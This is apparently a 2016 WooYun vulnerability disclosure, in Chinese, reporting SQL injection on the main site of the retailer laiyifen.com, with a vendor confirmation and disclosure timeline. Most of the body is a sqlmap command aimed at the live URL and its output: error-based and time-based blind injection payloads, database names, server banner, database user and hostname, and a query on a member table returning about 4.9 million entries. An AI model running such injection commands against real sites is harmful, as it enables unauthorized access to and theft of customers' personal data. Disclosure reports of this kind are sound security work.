乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-09: 细节已通知厂商并且等待厂商处理中 2016-03-10: 厂商已经确认,细节仅向厂商公开 2016-03-20: 细节向核心白帽子及相关领域专家公开 2016-03-30: 细节向普通白帽子公开 2016-04-09: 细节向实习白帽子公开 2016-04-24: 细节向公众公开
rt 看见昨天有个来伊份注入上了走了大厂商 我也挖一个 就在主站 求首页
python sqlmap.py -u "http://www.laiyifen.com/index.php/article*-zhifufangshi*_huodaofukuan*-lists*-11**.html" --dbs
Parameter: #5* (URI) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.laiyifen.com:80/index.php/article-zhifufangshi_huodaofukuan-lists-11" AND (SELECT 3099 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(3099=3099,1))),0x71706b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "KCUu"="KCUu.html Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: http://www.laiyifen.com:80/index.php/article-zhifufangshi_huodaofukuan-lists-11" AND SLEEP(5) AND "vpCf"="vpCf.html---[13:01:06] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.6back-end DBMS: MySQL 5.0[13:01:06] [INFO] fetching database names[13:01:07] [INFO] the SQL query used returns 3 entries[13:01:08] [INFO] retrieved: information_schema[13:01:09] [INFO] retrieved: laiyifendb[13:01:09] [INFO] retrieved: testavailable databases [3]:[*] information_schema[*] laiyifendb[*] test
[13:04:12] [INFO] the back-end DBMS is MySQL[13:04:12] [INFO] fetching banner[13:04:12] [INFO] resumed: 5.1.59 - ShopEX-MySQL-logweb application technology: Nginx, PHP 5.3.6back-end DBMS: MySQL 5.0banner: '5.1.59 - ShopEX-MySQL-log'[13:04:12] [INFO] fetching current user[13:04:12] [INFO] resumed: laiyifendb@10.%.%.%current user: 'laiyifendb@10.%.%.%'[13:04:12] [INFO] fetching current database[13:04:12] [INFO] resumed: laiyifendbcurrent database: 'laiyifendb'[13:04:12] [INFO] fetching server hostname[13:04:12] [INFO] resumed: db1hostname: 'db1'[13:04:12] [INFO] testing if current user is DBA[13:04:12] [INFO] fetching current usercurrent user is DBA: False[13:04:13] [INFO] fetching database users[13:04:13] [INFO] the SQL query used returns 1 entries[13:04:13] [INFO] resumed: 'laiyifendb'@'10.%.%.%'database management system users [1]:[*] 'laiyifendb'@'10.%.%.%'[20:17:05] [INFO] fetching entries for table 'sdb_b2c_members' in database 'laiyifendb' [20:17:08] [INFO] the SQL query used returns 4912874 entries
过滤
危害等级:高
漏洞Rank:20
确认时间:2016-03-10 11:39
非常感谢您的支持,我们一同努力做好!
暂无